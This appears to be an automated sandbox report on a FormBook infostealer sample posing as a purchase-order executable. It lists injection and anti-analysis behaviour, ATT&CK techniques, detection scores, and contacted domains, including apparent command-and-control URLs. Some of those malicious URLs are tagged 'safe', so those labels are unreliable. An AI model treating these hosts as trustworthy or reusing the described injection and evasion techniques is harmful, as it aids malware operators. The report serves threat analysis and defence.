          Source: explorer.exe, 0000000C.00000002.914070199.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeQueries volume information: C:\Users\user\Desktop\PO45937008ADENGY.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion13LSASS MemoryVirtualization/Sandbox Evasion13Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383974 Sample: PO45937008ADENGY.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 39 www.softballlyfe.com 2->39 41 www.helpmewithmyenergy.com 2->41 43 2 other IPs or domains 2->43 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 4 other signatures 2->67 11 PO45937008ADENGY.exe 15 4 2->11         started        signatures3 process4 dnsIp5 51 104.21.56.119, 443, 49727 CLOUDFLARENETUS United States 11->51 53 myliverpoolnews.cf 172.67.150.212, 49726, 80 CLOUDFLARENETUS United States 11->53 73 Tries to detect virtualization through RDTSC time measurements 11->73 75 Hides threads from debuggers 11->75 15 PO45937008ADENGY.exe 11->15         started        18 cmd.exe 1 11->18         started        20 WerFault.exe 23 9 11->20         started        22 2 other processes 11->22 signatures6 process7 signatures8 77 Modifies the context of a thread in another process (thread injection) 15->77 79 Maps a DLL or memory area into another process 15->79 81 Sample uses process hollowing technique 15->81 83 Queues an APC in another process (thread injection) 15->83 24 explorer.exe 15->24 injected 28 conhost.exe 18->28         started        30 timeout.exe 1 18->30         started        process9 dnsIp10 45 tuyensinhhaiphong.com 123.31.43.181, 49771, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 24->45 47 onstatic-pt.setupdns.net 81.88.57.70, 49764, 80 REGISTER-ASIT Italy 24->47 49 20 other IPs or domains 24->49 69 System process connects to network (likely due to code injection or exploit) 24->69 71 Performs DNS queries to domains with low reputation 24->71 32 wlanext.exe 24->32         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 32->55 57 Maps a DLL or memory area into another process 32->57 59 Tries to detect virtualization through RDTSC time measurements 32->59 35 cmd.exe 1 32->35         started        process14 process15 37 conhost.exe 35->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO45937008ADENGY.exe28%VirustotalBrowse
          PO45937008ADENGY.exe25%ReversingLabsByteCode-MSIL.Trojan.Pwsx
          PO45937008ADENGY.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.PO45937008ADENGY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          onstatic-pt.setupdns.net0%VirustotalBrowse
          thelandcle.com0%VirustotalBrowse
          helpmewithmyenergy.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ0%Avira URL Cloudsafe
          https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
          http://www.bookitstaugustine.com/mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl0%Avira URL Cloudsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
          http://www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl0%Avira URL Cloudsafe
          https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
          https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
          https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
          www.hnchotels.com/mb7q/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
          https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
          https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
          http://www.szmsbk.com/mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl0%Avira URL Cloudsafe
          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
          http://www.softballlyfe.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp0%Avira URL Cloudsafe
          https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
          https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
          https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
          http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html0%Avira URL Cloudsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
          https://reachplc.hub.loginradius.com&quot;0%Avira URL Cloudsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          onstatic-pt.setupdns.net
          		81.88.57.70
          		truetrueunknown
          thelandcle.com
          		85.17.172.1
          		truetrueunknown
          helpmewithmyenergy.com
          		34.102.136.180
          		truefalseunknown
          HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
          		3.223.115.185
          		truefalse
            		high
            softballlyfe.com
            		34.102.136.180
            		truefalse
              		unknown
              www.szmsbk.com
              		154.210.110.99
              		truetrue
                		unknown
                tuyensinhhaiphong.com
                		123.31.43.181
                		truetrue
                  		unknown
                  accessibleageing.com
                  		166.62.28.107
                  		truetrue
                    		unknown
                    prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                    		52.15.160.167
                    		truefalse
                      		high
                      pradnyanamaya.github.io
                      		185.199.108.153
                      		truetrue
                        		unknown
                        myliverpoolnews.cf
                        		172.67.150.212
                        		truefalse
                          		unknown
                          bookitstaugustine.com
                          		34.102.136.180
                          		truefalse
                            		unknown
                            ext-sq.squarespace.com
                            		198.185.159.144
                            		truefalse
                              		high
                              merkuryindustries.com
                              		34.102.136.180
                              		truefalse
                                		unknown
                                www.belatopapparel.xyz
                                		172.67.132.70
                                		truetrue
                                  		unknown
                                  www.bookitstaugustine.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.helpmewithmyenergy.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.hepimizdostuz.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.merkuryindustries.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.pradnyanamaya.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.hnchotels.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.softballlyfe.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.accessibleageing.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.thelandcle.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.beyju.store
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.theskineditco.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.tuyensinhhaiphong.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bookitstaugustine.com/mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xlfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xltrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          www.hnchotels.com/mb7q/true
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.szmsbk.com/mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xltrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.softballlyfe.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.htmlfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.accessibleageing.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnrtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.pradnyanamaya.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.merkuryindustries.com/mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xlfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.helpmewithmyenergy.com/mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xlfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://c.amazon-adsystem.com/aax2/apstag.jsPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.com/designersexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
